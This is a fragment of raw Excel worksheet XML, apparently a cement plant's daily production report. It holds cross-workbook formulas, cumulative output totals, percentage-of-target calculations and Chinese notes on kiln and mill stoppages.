        <f>'[14]6'!$N$11+'[14]6'!$N$12+'[14]6'!$N$13+'[14]6'!$N$14+'[14]6'!$N$15+'[14]6'!$N$16+'[14]6'!$N$17+'[14]6'!$N$18</f>
        <v>2814</v>
      </c>
      <c r="H62" s="194">
        <f>G62+'5'!H62</f>
        <v>13534</v>
      </c>
      <c r="I62" s="194">
        <f>H62+yc!I62</f>
        <v>849527.456</v>
      </c>
      <c r="J62" s="194">
        <f>'[14]6'!$Q$11+'[14]6'!$Q$12+'[14]6'!$Q$13+'[14]6'!$Q$14+'[14]6'!$Q$15+'[14]6'!$Q$16+'[14]6'!$Q$17+'[14]6'!$Q$18</f>
        <v>3987</v>
      </c>
      <c r="K62" s="194">
        <f>J62+'5'!K62</f>
        <v>15091</v>
      </c>
      <c r="L62" s="194">
        <f>K62+yc!L62</f>
        <v>849563.796</v>
      </c>
      <c r="M62" s="194">
        <f>'[14]6'!$T$11+'[14]6'!$T$12+'[14]6'!$T$13+'[14]6'!$T$14+'[14]6'!$T$15+'[14]6'!$T$16+'[14]6'!$T$17+'[14]6'!$T$18</f>
        <v>16897.634</v>
      </c>
      <c r="N62" s="207">
        <f>(M62+M63)/25000*100</f>
        <v>67.5905359999998</v>
      </c>
      <c r="O62" s="263"/>
      <c r="P62" s="274" t="s">
        <v>252</v>
      </c>
      <c r="Q62" s="271" t="str">
        <f>'[8]6'!$Q$71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'[14]6'!$M$19+'[14]6'!$M$20</f>
        <v>-2.00373051484348e-12</v>
      </c>
      <c r="G63" s="225">
        <f>'[14]6'!$N$19+'[14]6'!$N$20</f>
        <v>0</v>
      </c>
      <c r="H63" s="194">
        <f>G63+'5'!H63</f>
        <v>0</v>
      </c>
      <c r="I63" s="194">
        <f>H63+yc!I63</f>
        <v>0</v>
      </c>
      <c r="J63" s="194">
        <f>'[14]6'!$Q$19+'[14]6'!$Q$20</f>
        <v>0</v>
      </c>
      <c r="K63" s="194">
        <f>J63+'5'!K63</f>
        <v>0</v>
      </c>
      <c r="L63" s="194">
        <f>K63+yc!L63</f>
        <v>0</v>
      </c>
      <c r="M63" s="194">
        <f>'[14]6'!$T$19+'[14]6'!$T$20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G64+'5'!H64</f>
        <v>0</v>
      </c>
      <c r="I64" s="194">
        <f>H64+yc!I64</f>
        <v>0</v>
      </c>
      <c r="J64" s="194">
        <f>J65</f>
        <v>0</v>
      </c>
      <c r="K64" s="194">
        <f>J64+'5'!K64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G65+'5'!H65</f>
        <v>0</v>
      </c>
      <c r="I65" s="194">
        <f>H65+yc!I65</f>
        <v>0</v>
      </c>
      <c r="J65" s="194">
        <f>SUM(J66:J67)</f>
        <v>0</v>
      </c>
      <c r="K65" s="194">
        <f>J65+'5'!K65</f>
        <v>0</v>
      </c>
      <c r="L65" s="194">
        <f>K65+yc!L65</f>
        <v>0</v>
      </c>
      <c r="M65" s="194"/>
      <c r="N65" s="195"/>
      <c r="O65" s="263"/>
      <c r="P65" s="264" t="s">
        <v>304</v>
      </c>
      <c r="Q65" s="271" t="str">
        <f>'[8]6'!$Q$74</f>
        <v>1#窑:续停；2#窑:续停；1#磨:9:45-24:00避峰停机。2#磨:0:00-24:00库满停机。3#磨:13:30-22:20库满停机。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G66+'5'!H66</f>
        <v>0</v>
      </c>
      <c r="I66" s="194">
        <f>H66+yc!I66</f>
        <v>0</v>
      </c>
      <c r="J66" s="194"/>
      <c r="K66" s="194">
        <f>J66+'5'!K66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G67+'5'!H67</f>
        <v>0</v>
      </c>
      <c r="I67" s="194">
        <f>H67+yc!I67</f>
        <v>0</v>
      </c>
      <c r="J67" s="194"/>
      <c r="K67" s="194">
        <f>J67+'5'!K67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'[15]6'!$D$6</f>
        <v>1502.56</v>
      </c>
      <c r="G68" s="194">
        <f>'[15]6'!$E$6</f>
        <v>0</v>
      </c>
      <c r="H68" s="194">
        <f>G68+'5'!H68</f>
        <v>0</v>
      </c>
      <c r="I68" s="194">
        <f>H68+yc!I68</f>
        <v>0</v>
      </c>
      <c r="J68" s="194">
        <f>'[15]6'!$H$6</f>
        <v>0</v>
      </c>
      <c r="K68" s="194">
        <f>J68+'5'!K68</f>
        <v>0</v>
      </c>
      <c r="L68" s="194">
        <f>K68+yc!L68</f>
        <v>0</v>
      </c>
      <c r="M68" s="194">
        <f>'[15]6'!$K$6</f>
        <v>1502.56</v>
      </c>
      <c r="N68" s="195">
        <f>M68/50000*100</f>
        <v>3.00512</v>
      </c>
      <c r="O68" s="263"/>
      <c r="P68" s="264" t="s">
        <v>262</v>
      </c>
      <c r="Q68" s="271" t="str">
        <f>'[8]6'!$Q$77</f>
        <v>1#磨正常运行。2#磨14:30-22:15避峰停机:7.75小时(避峰)。</v>
      </c>
      <c r="R68" s="272"/>
      <c r="S68" s="272"/>
      <c r="T68" s="272"/>
      <c r="U68" s="272"/>
      <c r="V68" s="272"/>
      <c r="W68" s="272"/>
      <c r="X68" s="272"/>
      <c r="Y68" s="272"/>
      <c r="Z68" s="273"/>
    </row>
    <row r="69" ht="15.75" customHeight="1" spans="1:26">
      <c r="A69" s="191"/>
      <c r="B69" s="193" t="s">
        <v>283</v>
      </c>
      <c r="C69" s="193"/>
      <c r="D69" s="206" t="s">
        <v>250</v>
      </c>
      <c r="E69" s="194"/>
      <c r="F69" s="194">
        <f>'[15]6'!$D$43+'[15]6'!$D$44</f>
        <v>467.66</v>
      </c>
      <c r="G69" s="194">
        <f>'[15]6'!$E$43+'[15]6'!$E$44</f>
        <v>0</v>
      </c>
      <c r="H69" s="194">
        <f>G69+'5'!H69</f>
        <v>0</v>
      </c>
      <c r="I69" s="194">
        <f>H69+yc!I69</f>
        <v>0</v>
      </c>
      <c r="J69" s="194">
        <f>'[15]6'!$H$43+'[15]6'!$H$44</f>
        <v>0</v>
      </c>
      <c r="K69" s="194">
        <f>J69+'5'!K69</f>
        <v>0</v>
      </c>
      <c r="L69" s="194">
        <f>K69+yc!L69</f>
        <v>0</v>
      </c>
      <c r="M69" s="194">
        <f>'[15]6'!$K$43+'[15]6'!$K$44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'[15]6'!$D$45</f>
        <v>0</v>
      </c>
      <c r="G70" s="194">
        <f>'[15]6'!$E$45</f>
        <v>0</v>
      </c>
      <c r="H70" s="194">
        <f>G70+'5'!H70</f>
        <v>0</v>
      </c>
      <c r="I70" s="194">
        <f>H70+yc!I70</f>
        <v>0</v>
      </c>
      <c r="J70" s="194">
        <f>'[15]6'!$H$45</f>
        <v>0</v>
      </c>
      <c r="K70" s="194">
        <f>J70+'5'!K70</f>
        <v>0</v>
      </c>
      <c r="L70" s="194">
        <f>K70+yc!L70</f>
        <v>0</v>
      </c>
      <c r="M70" s="194">
        <f>'[15]6'!$K$45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G71+'5'!H71</f>
        <v>0</v>
      </c>
      <c r="I71" s="194">
        <f>H71+yc!I71</f>
        <v>0</v>
      </c>
      <c r="J71" s="194">
        <f>J72</f>
        <v>0</v>
      </c>
      <c r="K71" s="194">
        <f>J71+'5'!K71</f>
        <v>0</v>
      </c>
      <c r="L71" s="194">
        <f>K71+yc!L71</f>
        <v>0</v>
      </c>
      <c r="M71" s="194"/>
      <c r="N71" s="195"/>
      <c r="O71" s="263"/>
      <c r="P71" s="264" t="s">
        <v>263</v>
      </c>
      <c r="Q71" s="271" t="str">
        <f>'[8]6'!$Q$80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G72+'5'!H72</f>
        <v>0</v>
      </c>
      <c r="I72" s="194">
        <f>H72+yc!I72</f>
        <v>0</v>
      </c>
      <c r="J72" s="194">
        <f>SUM(J73:J74)</f>
        <v>0</v>
      </c>
      <c r="K72" s="194">
        <f>J72+'5'!K72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G73+'5'!H73</f>
        <v>0</v>
      </c>
      <c r="I73" s="194">
        <f>H73+yc!I73</f>
        <v>0</v>
      </c>
      <c r="J73" s="194"/>
      <c r="K73" s="194">
        <f>J73+'5'!K73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G74+'5'!H74</f>
        <v>0</v>
      </c>
      <c r="I74" s="194">
        <f>H74+yc!I74</f>
        <v>0</v>
      </c>
      <c r="J74" s="194"/>
      <c r="K74" s="194">
        <f>J74+'5'!K74</f>
        <v>0</v>
      </c>
      <c r="L74" s="194">
        <f>K74+yc!L74</f>
        <v>0</v>
      </c>
      <c r="M74" s="194"/>
      <c r="N74" s="195"/>
      <c r="O74" s="263"/>
      <c r="P74" s="278" t="s">
        <v>311</v>
      </c>
      <c r="Q74" s="271" t="str">
        <f>'[8]6'!$Q$83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G75+'5'!H75</f>
        <v>0</v>
      </c>
      <c r="I75" s="194">
        <f>H75+yc!I75</f>
        <v>0</v>
      </c>
      <c r="J75" s="241">
        <f>J76</f>
        <v>0</v>
      </c>
      <c r="K75" s="194">
        <f>J75+'5'!K75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G76+'5'!H76</f>
        <v>0</v>
      </c>
      <c r="I76" s="194">
        <f>H76+yc!I76</f>
        <v>0</v>
      </c>
      <c r="J76" s="241">
        <f>SUM(J77:J78)</f>
        <v>0</v>
      </c>
      <c r="K76" s="194">
        <f>J76+'5'!K76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G77+'5'!H77</f>
        <v>0</v>
      </c>
      <c r="I77" s="194">
        <f>H77+yc!I77</f>
        <v>0</v>
      </c>
      <c r="J77" s="241"/>
      <c r="K77" s="194">
        <f>J77+'5'!K77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G78+'5'!H78</f>
        <v>0</v>
      </c>
      <c r="I78" s="194">
        <f>H78+yc!I78</f>
        <v>0</v>
      </c>
      <c r="J78" s="241"/>
      <c r="K78" s="194">
        <f>J78+'5'!K78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'[16]6'!$E$7</f>
        <v>404.96</v>
      </c>
      <c r="H79" s="194">
        <f>G79+'5'!H79</f>
        <v>3119.06</v>
      </c>
      <c r="I79" s="301">
        <f>H79+yc!I79</f>
        <v>150247.53</v>
      </c>
      <c r="J79" s="301">
        <f>'[16]6'!$I$7</f>
        <v>611</v>
      </c>
      <c r="K79" s="194">
        <f>J79+'5'!K79</f>
        <v>3069.5</v>
      </c>
      <c r="L79" s="301">
        <f>K79+yc!L79</f>
        <v>144960.95</v>
      </c>
      <c r="M79" s="301">
        <f>'[16]6'!$L$7</f>
        <v>4934.34</v>
      </c>
      <c r="N79" s="302">
        <f>M79/50000*100</f>
        <v>9.86868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'[16]6'!$R$15</f>
        <v>0</v>
      </c>
      <c r="H80" s="194">
        <f>G80+'5'!H80</f>
        <v>0</v>
      </c>
      <c r="I80" s="301">
        <f>H80+yc!I80</f>
        <v>0</v>
      </c>
      <c r="J80" s="301">
        <f>'[16]6'!$V$15</f>
        <v>0</v>
      </c>
      <c r="K80" s="194">
        <f>J80+'5'!K80</f>
        <v>0</v>
      </c>
      <c r="L80" s="301">
        <f>K80+yc!L80</f>
        <v>0</v>
      </c>
      <c r="M80" s="301">
        <f>'[16]6'!$Y$15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G81+'5'!H81</f>
        <v>0</v>
      </c>
      <c r="I81" s="301">
        <f>H81+yc!I81</f>
        <v>0</v>
      </c>
      <c r="J81" s="301"/>
      <c r="K81" s="194">
        <f>J81+'5'!K81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G82+'5'!H82</f>
        <v>0</v>
      </c>
      <c r="I82" s="301">
        <f>H82+yc!I82</f>
        <v>0</v>
      </c>
      <c r="J82" s="301"/>
      <c r="K82" s="194">
        <f>J82+'5'!K82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G83+'5'!H83</f>
        <v>0</v>
      </c>
      <c r="I83" s="301">
        <f>H83+yc!I83</f>
        <v>0</v>
      </c>
      <c r="J83" s="301"/>
      <c r="K83" s="194">
        <f>J83+'5'!K83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G84+'5'!H84</f>
        <v>0</v>
      </c>
      <c r="I84" s="301">
        <f>H84+yc!I84</f>
        <v>0</v>
      </c>
      <c r="J84" s="301"/>
      <c r="K84" s="194">
        <f>J84+'5'!K84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G85+'5'!H85</f>
        <v>0</v>
      </c>
      <c r="I85" s="301">
        <f>H85+yc!I85</f>
        <v>0</v>
      </c>
      <c r="J85" s="301"/>
      <c r="K85" s="194">
        <f>J85+'5'!K85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Z158"/>
  <sheetViews>
    <sheetView workbookViewId="0">
      <pane xSplit="4" ySplit="4" topLeftCell="E17"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7/31</f>
        <v>0.225806451612903</v>
      </c>
      <c r="J2" s="180"/>
      <c r="K2" s="181"/>
      <c r="L2" s="180"/>
      <c r="M2" s="180"/>
      <c r="N2" s="182">
        <v>45998</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20128.46</v>
      </c>
      <c r="H5" s="194">
        <f>G5+'6'!H5</f>
        <v>149304.33</v>
      </c>
      <c r="I5" s="194">
        <f>H5+yc!I5</f>
        <v>6304170.36</v>
      </c>
      <c r="J5" s="194">
        <f>J21+J31+J41+J51+J61+J68+J79</f>
        <v>23374.009</v>
      </c>
      <c r="K5" s="194">
        <f>J5+'6'!K5</f>
        <v>159648.356</v>
      </c>
      <c r="L5" s="194">
        <f>K5+yc!L5</f>
        <v>6309719.487</v>
      </c>
      <c r="M5" s="194">
        <f>M21+M31+M41+M51+M61+M68+M79</f>
        <v>257123.798</v>
      </c>
      <c r="N5" s="195">
        <f>M5/374000*100</f>
        <v>68.7496786096256</v>
      </c>
      <c r="O5" s="196" t="s">
        <v>228</v>
      </c>
      <c r="P5" s="197" t="s">
        <v>229</v>
      </c>
      <c r="Q5" s="193" t="s">
        <v>291</v>
      </c>
      <c r="R5" s="198">
        <f>'[10]7'!$W$101</f>
        <v>267.625</v>
      </c>
      <c r="S5" s="198">
        <f>'[10]7'!$X$101</f>
        <v>272.505952380952</v>
      </c>
      <c r="T5" s="198">
        <f>'[10]7'!$Y$101</f>
        <v>260.331518266805</v>
      </c>
      <c r="U5" s="198">
        <f>'[10]7'!$T$101</f>
        <v>100</v>
      </c>
      <c r="V5" s="198">
        <f>'[10]7'!$U$101</f>
        <v>100</v>
      </c>
      <c r="W5" s="198">
        <f>'[10]7'!$V$101</f>
        <v>65.387573313783</v>
      </c>
      <c r="X5" s="198">
        <f>'[10]7'!$Q$101</f>
        <v>24</v>
      </c>
      <c r="Y5" s="198">
        <f>'[10]7'!$R$101</f>
        <v>168</v>
      </c>
      <c r="Z5" s="198">
        <f>'[10]7'!$S$101</f>
        <v>5351.319</v>
      </c>
    </row>
    <row r="6" ht="15.75" customHeight="1" spans="1:26">
      <c r="A6" s="191"/>
      <c r="B6" s="191" t="s">
        <v>231</v>
      </c>
      <c r="C6" s="193" t="s">
        <v>232</v>
      </c>
      <c r="D6" s="193"/>
      <c r="E6" s="194"/>
      <c r="F6" s="194">
        <f>'[10]7'!$D$23+'[11]7'!$D$17+'[12]7'!$D$17+'[13]7'!$D$25+'[14]7'!$D$8+'[14]7'!$D$15+'[15]7'!$D$7</f>
        <v>32112.84</v>
      </c>
      <c r="G6" s="194">
        <f>'[10]7'!$E$23+'[11]7'!$E$17+'[12]7'!$E$17+'[13]7'!$E$25+'[14]7'!$E$8+'[14]7'!$E$15+'[15]7'!$E$7</f>
        <v>1159</v>
      </c>
      <c r="H6" s="194">
        <f>G6+'6'!H6</f>
        <v>2107</v>
      </c>
      <c r="I6" s="194">
        <f>H6+yc!I6</f>
        <v>278456.96</v>
      </c>
      <c r="J6" s="194">
        <f>'[10]7'!$I$23+'[11]7'!$I$17+'[12]7'!$I$17+'[13]7'!$I$25+'[14]7'!$E$23+'[14]7'!$E$30+'[15]7'!$H$7</f>
        <v>856.31</v>
      </c>
      <c r="K6" s="194">
        <f>J6+'6'!K6</f>
        <v>5276.72</v>
      </c>
      <c r="L6" s="194">
        <f>K6+yc!L6</f>
        <v>267474.42</v>
      </c>
      <c r="M6" s="194">
        <f>'[10]7'!$L$23+'[11]7'!$L$17+'[12]7'!$L$17+'[13]7'!$L$25+'[14]7'!$H$23+'[14]7'!$H$30+'[15]7'!$K$7</f>
        <v>28943.12</v>
      </c>
      <c r="N6" s="195"/>
      <c r="O6" s="199"/>
      <c r="P6" s="200"/>
      <c r="Q6" s="193" t="s">
        <v>292</v>
      </c>
      <c r="R6" s="198">
        <f>'[10]7'!$W$102</f>
        <v>0</v>
      </c>
      <c r="S6" s="198">
        <f>'[10]7'!$X$102</f>
        <v>0</v>
      </c>
      <c r="T6" s="198">
        <f>'[10]7'!$Y$102</f>
        <v>240.280205356462</v>
      </c>
      <c r="U6" s="198">
        <f>'[10]7'!$T$102</f>
        <v>0</v>
      </c>
      <c r="V6" s="198">
        <f>'[10]7'!$U$102</f>
        <v>0</v>
      </c>
      <c r="W6" s="198">
        <f>'[10]7'!$V$102</f>
        <v>34.7653836754643</v>
      </c>
      <c r="X6" s="198">
        <f>'[10]7'!$Q$102</f>
        <v>0</v>
      </c>
      <c r="Y6" s="198">
        <f>'[10]7'!$R$102</f>
        <v>0</v>
      </c>
      <c r="Z6" s="198">
        <f>'[10]7'!$S$102</f>
        <v>2845.199</v>
      </c>
    </row>
    <row r="7" ht="15.75" customHeight="1" spans="1:26">
      <c r="A7" s="191"/>
      <c r="B7" s="191"/>
      <c r="C7" s="201" t="s">
        <v>331</v>
      </c>
      <c r="D7" s="201"/>
      <c r="E7" s="194"/>
      <c r="F7" s="194">
        <f>'[12]7'!$D$22</f>
        <v>0</v>
      </c>
      <c r="G7" s="194">
        <f>'[12]7'!$E$22</f>
        <v>0</v>
      </c>
      <c r="H7" s="194">
        <f>G7+'6'!H7</f>
        <v>0</v>
      </c>
      <c r="I7" s="194">
        <f>H7+yc!I7</f>
        <v>0</v>
      </c>
      <c r="J7" s="194">
        <f>'[12]7'!$I$22</f>
        <v>0</v>
      </c>
      <c r="K7" s="194">
        <f>J7+'6'!K7</f>
        <v>0</v>
      </c>
      <c r="L7" s="194">
        <f>K7+yc!L7</f>
        <v>0</v>
      </c>
      <c r="M7" s="194">
        <f>'[12]7'!$L$22</f>
        <v>0</v>
      </c>
      <c r="N7" s="195"/>
      <c r="O7" s="199"/>
      <c r="P7" s="200"/>
      <c r="Q7" s="193" t="s">
        <v>233</v>
      </c>
      <c r="R7" s="202">
        <f>'[10]7'!$W$107</f>
        <v>133.274492497793</v>
      </c>
      <c r="S7" s="202">
        <f>'[10]7'!$X$107</f>
        <v>125.586519766688</v>
      </c>
      <c r="T7" s="198">
        <f>'[10]7'!$Y$107</f>
        <v>131.740277376707</v>
      </c>
      <c r="U7" s="198">
        <f>'[10]7'!$T$107</f>
        <v>47.2083333333333</v>
      </c>
      <c r="V7" s="198">
        <f>'[10]7'!$U$107</f>
        <v>45.922619047619</v>
      </c>
      <c r="W7" s="198">
        <f>'[10]7'!$V$107</f>
        <v>31.3120723362658</v>
      </c>
      <c r="X7" s="198">
        <f>'[10]7'!$Q$107</f>
        <v>11.33</v>
      </c>
      <c r="Y7" s="198">
        <f>'[10]7'!$R$107</f>
        <v>77.15</v>
      </c>
      <c r="Z7" s="198">
        <f>'[10]7'!$S$107</f>
        <v>2562.58</v>
      </c>
    </row>
    <row r="8" ht="15.75" customHeight="1" spans="1:26">
      <c r="A8" s="191"/>
      <c r="B8" s="191"/>
      <c r="C8" s="201" t="s">
        <v>236</v>
      </c>
      <c r="D8" s="201"/>
      <c r="E8" s="194"/>
      <c r="F8" s="194">
        <f>'[10]7'!$D$27+'[11]7'!$D$18+'[13]7'!$D$26+'[14]7'!$D$10+'[14]7'!$D$17+'[15]7'!$D$9</f>
        <v>41879.9</v>
      </c>
      <c r="G8" s="194">
        <f>'[10]7'!$E$27+'[11]7'!$E$18+'[13]7'!$E$26+'[14]7'!$E$10+'[14]7'!$E$17+'[15]7'!$E$9</f>
        <v>2143</v>
      </c>
      <c r="H8" s="194">
        <f>G8+'6'!H8</f>
        <v>12652</v>
      </c>
      <c r="I8" s="194">
        <f>H8+yc!I8</f>
        <v>538188.99</v>
      </c>
      <c r="J8" s="194">
        <f>'[10]7'!$I$27+'[11]7'!$I$18+'[13]7'!$I$26+'[14]7'!$E$25+'[14]7'!$E$32+'[15]7'!$H$9</f>
        <v>2241.36</v>
      </c>
      <c r="K8" s="194">
        <f>J8+'6'!K8</f>
        <v>17468.56</v>
      </c>
      <c r="L8" s="194">
        <f>K8+yc!L8</f>
        <v>525213.27</v>
      </c>
      <c r="M8" s="194">
        <f>'[10]7'!$L$27+'[11]7'!$L$18+'[13]7'!$L$26+'[14]7'!$H$25+'[14]7'!$H$32+'[15]7'!$K$9</f>
        <v>37063.34</v>
      </c>
      <c r="N8" s="195"/>
      <c r="O8" s="199"/>
      <c r="P8" s="200"/>
      <c r="Q8" s="193" t="s">
        <v>235</v>
      </c>
      <c r="R8" s="198">
        <f>'[10]7'!$W$108</f>
        <v>125.363020329138</v>
      </c>
      <c r="S8" s="198">
        <f>'[10]7'!$X$108</f>
        <v>128.006610729723</v>
      </c>
      <c r="T8" s="198">
        <f>'[10]7'!$Y$108</f>
        <v>127.444397080215</v>
      </c>
      <c r="U8" s="198">
        <f>'[10]7'!$T$108</f>
        <v>43.0416666666667</v>
      </c>
      <c r="V8" s="198">
        <f>'[10]7'!$U$108</f>
        <v>46.8214285714286</v>
      </c>
      <c r="W8" s="198">
        <f>'[10]7'!$V$108</f>
        <v>27.8043743890518</v>
      </c>
      <c r="X8" s="198">
        <f>'[10]7'!$Q$108</f>
        <v>10.33</v>
      </c>
      <c r="Y8" s="198">
        <f>'[10]7'!$R$108</f>
        <v>78.66</v>
      </c>
      <c r="Z8" s="198">
        <f>'[10]7'!$S$108</f>
        <v>2275.51</v>
      </c>
    </row>
    <row r="9" ht="15.75" customHeight="1" spans="1:26">
      <c r="A9" s="191"/>
      <c r="B9" s="191"/>
      <c r="C9" s="201" t="s">
        <v>238</v>
      </c>
      <c r="D9" s="201"/>
      <c r="E9" s="194"/>
      <c r="F9" s="194">
        <f>'[10]7'!$D$24+'[11]7'!$D$19+'[12]7'!$D$20+'[13]7'!$D$27+'[14]7'!$D$11+'[14]7'!$D$18+'[15]7'!$D$10</f>
        <v>110865.712</v>
      </c>
      <c r="G9" s="194">
        <f>'[10]7'!$E$24+'[11]7'!$E$19+'[12]7'!$E$20+'[13]7'!$E$27+'[14]7'!$E$11+'[14]7'!$E$18+'[15]7'!$E$10</f>
        <v>12016</v>
      </c>
      <c r="H9" s="194">
        <f>G9+'6'!H9</f>
        <v>112331</v>
      </c>
      <c r="I9" s="194">
        <f>H9+yc!I9</f>
        <v>4247719.88</v>
      </c>
      <c r="J9" s="194">
        <f>'[10]7'!$I$24+'[11]7'!$I$19+'[12]7'!$I$20+'[13]7'!$I$27+'[14]7'!$E$26+'[14]7'!$E$33+'[15]7'!$H$10</f>
        <v>16168.679</v>
      </c>
      <c r="K9" s="194">
        <f>J9+'6'!K9</f>
        <v>105891.866</v>
      </c>
      <c r="L9" s="194">
        <f>K9+yc!L9</f>
        <v>4203370.677</v>
      </c>
      <c r="M9" s="194">
        <f>'[10]7'!$L$24+'[11]7'!$L$19+'[12]7'!$L$20+'[13]7'!$L$27+'[14]7'!$H$26+'[14]7'!$H$33+'[15]7'!$K$10</f>
        <v>117304.846</v>
      </c>
      <c r="N9" s="195"/>
      <c r="O9" s="199"/>
      <c r="P9" s="200"/>
      <c r="Q9" s="193" t="s">
        <v>294</v>
      </c>
      <c r="R9" s="198">
        <f>'[10]7'!$W$109</f>
        <v>269.822485207101</v>
      </c>
      <c r="S9" s="198">
        <f>'[10]7'!$X$109</f>
        <v>270.22486104093</v>
      </c>
      <c r="T9" s="198">
        <f>'[10]7'!$Y$109</f>
        <v>271.283068092878</v>
      </c>
      <c r="U9" s="198">
        <f>'[10]7'!$T$109</f>
        <v>49.2916666666667</v>
      </c>
      <c r="V9" s="198">
        <f>'[10]7'!$U$109</f>
        <v>47.1190476190476</v>
      </c>
      <c r="W9" s="198">
        <f>'[10]7'!$V$109</f>
        <v>35.1264662756598</v>
      </c>
      <c r="X9" s="198">
        <f>'[10]7'!$Q$109</f>
        <v>11.83</v>
      </c>
      <c r="Y9" s="198">
        <f>'[10]7'!$R$109</f>
        <v>79.16</v>
      </c>
      <c r="Z9" s="198">
        <f>'[10]7'!$S$109</f>
        <v>2874.74999999999</v>
      </c>
    </row>
    <row r="10" ht="15.75" customHeight="1" spans="1:26">
      <c r="A10" s="191"/>
      <c r="B10" s="191"/>
      <c r="C10" s="201" t="s">
        <v>295</v>
      </c>
      <c r="D10" s="201"/>
      <c r="E10" s="194"/>
      <c r="F10" s="194">
        <f>'[10]7'!$D$25+'[11]7'!$D$20+'[12]7'!$D$21+'[13]7'!$D$28+'[14]7'!$D$12+'[14]7'!$D$19+'[15]7'!$D$11</f>
        <v>61206.942</v>
      </c>
      <c r="G10" s="194">
        <f>'[10]7'!$E$25+'[11]7'!$E$20+'[12]7'!$E$21+'[13]7'!$E$28+'[14]7'!$E$12+'[14]7'!$E$19+'[15]7'!$E$11</f>
        <v>4245</v>
      </c>
      <c r="H10" s="194">
        <f>G10+'6'!H10</f>
        <v>13771</v>
      </c>
      <c r="I10" s="194">
        <f>H10+yc!I10</f>
        <v>931298.17</v>
      </c>
      <c r="J10" s="194">
        <f>'[10]7'!$I$25+'[11]7'!$I$20+'[12]7'!$I$21+'[13]7'!$I$28+'[14]7'!$E$27+'[14]7'!$E$34+'[15]7'!$H$11</f>
        <v>2578.66</v>
      </c>
      <c r="K10" s="194">
        <f>J10+'6'!K10</f>
        <v>21334.84</v>
      </c>
      <c r="L10" s="194">
        <f>K10+yc!L10</f>
        <v>918563.56</v>
      </c>
      <c r="M10" s="194">
        <f>'[10]7'!$L$25+'[11]7'!$L$20+'[12]7'!$L$21+'[13]7'!$L$28+'[14]7'!$H$27+'[14]7'!$H$34+'[15]7'!$K$11</f>
        <v>53643.102</v>
      </c>
      <c r="N10" s="195"/>
      <c r="O10" s="199"/>
      <c r="P10" s="200"/>
      <c r="Q10" s="193" t="s">
        <v>296</v>
      </c>
      <c r="R10" s="198">
        <f>'[10]7'!$W$110</f>
        <v>261.571428571429</v>
      </c>
      <c r="S10" s="198">
        <f>'[10]7'!$X$110</f>
        <v>272.974358974359</v>
      </c>
      <c r="T10" s="198">
        <f>'[10]7'!$Y$110</f>
        <v>268.908264539468</v>
      </c>
      <c r="U10" s="198">
        <f>'[10]7'!$T$110</f>
        <v>29.1666666666667</v>
      </c>
      <c r="V10" s="198">
        <f>'[10]7'!$U$110</f>
        <v>23.2142857142857</v>
      </c>
      <c r="W10" s="198">
        <f>'[10]7'!$V$110</f>
        <v>34.2504887585532</v>
      </c>
      <c r="X10" s="198">
        <f>'[10]7'!$Q$110</f>
        <v>7</v>
      </c>
      <c r="Y10" s="198">
        <f>'[10]7'!$R$110</f>
        <v>39</v>
      </c>
      <c r="Z10" s="198">
        <f>'[10]7'!$S$110</f>
        <v>2803.06</v>
      </c>
    </row>
    <row r="11" ht="15.75" customHeight="1" spans="1:26">
      <c r="A11" s="191"/>
      <c r="B11" s="191"/>
      <c r="C11" s="201" t="s">
        <v>297</v>
      </c>
      <c r="D11" s="201"/>
      <c r="E11" s="194"/>
      <c r="F11" s="194">
        <f>'[10]7'!$D$26+'[11]7'!$D$21+'[12]7'!$D$19+'[13]7'!$D$29+'[14]7'!$D$13+'[14]7'!$D$20</f>
        <v>0</v>
      </c>
      <c r="G11" s="194">
        <f>'[10]7'!$E$26+'[11]7'!$E$21+'[12]7'!$E$19+'[13]7'!$E$29+'[14]7'!$E$13+'[14]7'!$E$20</f>
        <v>0</v>
      </c>
      <c r="H11" s="194">
        <f>G11+'6'!H11</f>
        <v>153.81</v>
      </c>
      <c r="I11" s="194">
        <f>H11+yc!I11</f>
        <v>153.81</v>
      </c>
      <c r="J11" s="194">
        <f>'[10]7'!$I$26+'[11]7'!$I$21+'[12]7'!$I$19+'[13]7'!$I$29+'[14]7'!$E$28+'[14]7'!$E$35</f>
        <v>0</v>
      </c>
      <c r="K11" s="194">
        <f>J11+'6'!K11</f>
        <v>0</v>
      </c>
      <c r="L11" s="194">
        <f>K11+yc!L11</f>
        <v>0</v>
      </c>
      <c r="M11" s="194">
        <f>'[10]7'!$L$26+'[11]7'!$L$21+'[12]7'!$L$19+'[13]7'!$L$29+'[14]7'!$H$28+'[14]7'!$H$35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12771</v>
      </c>
      <c r="H12" s="194">
        <f>G12+'6'!H12</f>
        <v>66873.0000000001</v>
      </c>
      <c r="I12" s="194">
        <f>H12+yc!I12</f>
        <v>5009264.25</v>
      </c>
      <c r="J12" s="194">
        <f>J22+J32+J42+J52+J62+J69</f>
        <v>18017.95</v>
      </c>
      <c r="K12" s="194">
        <f>J12+'6'!K12</f>
        <v>126211.418</v>
      </c>
      <c r="L12" s="194">
        <f>K12+yc!L12</f>
        <v>5155317.794</v>
      </c>
      <c r="M12" s="194">
        <f>M22+M32+M42+M52+M62+M69</f>
        <v>329107.28700005</v>
      </c>
      <c r="N12" s="205">
        <f>M12/439000*100</f>
        <v>74.967491343975</v>
      </c>
      <c r="O12" s="199"/>
      <c r="P12" s="200"/>
      <c r="Q12" s="203" t="s">
        <v>299</v>
      </c>
      <c r="R12" s="204">
        <f>'[16]7'!$W$40</f>
        <v>0</v>
      </c>
      <c r="S12" s="204">
        <f>'[16]7'!$X$40</f>
        <v>0</v>
      </c>
      <c r="T12" s="204">
        <f>'[16]7'!$Y$40</f>
        <v>0</v>
      </c>
      <c r="U12" s="204">
        <f>'[16]7'!$T$40</f>
        <v>0</v>
      </c>
      <c r="V12" s="204">
        <f>'[16]7'!$U$40</f>
        <v>0</v>
      </c>
      <c r="W12" s="204">
        <f>'[16]7'!$V$40</f>
        <v>0</v>
      </c>
      <c r="X12" s="204">
        <f>'[16]7'!$Q$40</f>
        <v>0</v>
      </c>
      <c r="Y12" s="204">
        <f>'[16]7'!$R$40</f>
        <v>0</v>
      </c>
      <c r="Z12" s="204">
        <f>'[16]7'!$S$40</f>
        <v>0</v>
      </c>
    </row>
    <row r="13" ht="15.75" customHeight="1" spans="1:26">
      <c r="A13" s="191"/>
      <c r="B13" s="193"/>
      <c r="C13" s="193"/>
      <c r="D13" s="206" t="s">
        <v>248</v>
      </c>
      <c r="E13" s="194">
        <f>E23+E33+E43+E53+E63+E70</f>
        <v>0</v>
      </c>
      <c r="F13" s="194">
        <f>F23+F33+F43+F53+F63+F70</f>
        <v>-2.00373051484348e-12</v>
      </c>
